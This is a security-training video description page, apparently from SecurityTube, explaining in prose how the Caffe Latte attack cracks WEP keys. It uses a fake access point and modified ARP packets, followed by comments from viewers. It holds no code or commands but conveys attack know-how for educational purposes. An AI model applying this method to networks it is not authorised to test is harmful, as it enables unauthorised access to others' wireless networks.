Description: Welcome to Part 17 of the WLAN Security Megaprimer! Please start this series by watching Part 1 http://www.securitytube.net/video/1756, if you have not done so already.
In this video, we will look at a demo of the infamous Caffe Latte attack. The basic idea is to utilize WEP's message modification vulnerability to our advantage. We will allow the client to associate with our fake access point. Once the client is connected, it will send out DHCP requests which will eventually timeout. Then the client will send our Gratuitous ARP packets for the auto-configuration IP address.
The Caffe Latte attack captures these Gratuitous ARP packets and modifies them using the Message Modification flaw to convert them into ARP request packets for the same host! Then we resend it back into the wireless network. The Client receives them and feels that someone is requesting for its MAC address using ARP and hence replies back. The attacker's fake access point generates a few thousand of these spurious ARP requests per minute and receives responses from the Client. It is important to note that the attacker is able to do this without any knowledge of the WEP key. Once the attacker collects enough packets, he runs it though Aircrack-NG to get his prize :)
Here is a nifty lil video on Caffe Latte created by my friend Zero_Chaos a while back: http://www.securitytube.net/video/122
Tags: 802.11 , WEP , Cracking , Aireplay-ng , ARP , replay , security , hacking , wireless , weak IV , Caffe Latte , Message Modification , XOR ,
thank you for posting another great video Vivek :)
BTW, Vivek. Your massive posting schedule has encouraged me to create one of my own. It took a while to find a subject you haven't covered. :)
It'll be called "Mitigating the Rogue DHCP Server"
Should be ready Thursday night.
Brilliant Vivek, thanks! I suspect you may well be a professor soon :-)
Excellent, watching it right away.
Great Work DUDE!!!
brilliant work actually :D
Thank You Vivek
heheh again: http://vimeo.com/23222903 3rd video today !! Thanks a lot Vivek, i really appreciate all your hard work.
You always make great videos! Waiting for the next ones :)
Great explained like every other video of your megaprimer!
Go on Vivek!
Great Video....Thanks
Awesome vivek,
Thank You,
The last two videos have been in great detail which is exactly what I like. I don't only want to know how (many YouTube videos show that, some rather badly!) but WHY and exactly what's happening "under the hood". I'll have to watch them a few more times but, if my initial impression is correct, the authentication was open. Can this be done if the authentication is set to PSK? Would the spoofed AP simply respond "yes, I know you are who you say you are, let's associate and then exchange data"?
@behrouz, m0ei, ahmadqdemat, luizfzs, 2IL060, Machinst, zidane Thanks a ton guys!
@Blackmarketeer I wanted to always :)
#Ignatius With WPA/WPA2 the situation is tricky, in the next couple of videos we will be taking it up :) so stay tuned!
Next video: Hirte Attack! posted :) Enjoy.
thanks for all the videos
i skipped ahead to the video that covered the wep cracking because im currently involved in a project at college to find methods of cracking wireless networks and then securing these networks, i successfully cracked wep using a tool called grimwepa in backtrack, i got the pass key, but i need to know if i can convert it back to the pass phrase
correct me if im wrong still learning
thanks for the videos and appreciate the hard work
Thanks vivek! This is another attack to add to my arsenal. Your videos are an integral part of my developing Wifi Security and Hacking skills.
@silentkiller: grimwepa, huh? I ought to try that out. Thanks for putting me onto that. Usually i just arp replay, or packetforge. Thanks.
Hi Vivek
my question is about fake AP using airbase-ng
when a client connects to a fake ap ,how does the fake ap sends the reply to the arp request of client.
if airbase does not send any reply to ARP request then can you suggest me any other program like airbase which sends these replies ..
Thanks a ton in advance
Thank you very much Vivek, don't stop!
I'm eager to get into PEAP exploits.
thanks thanks thanks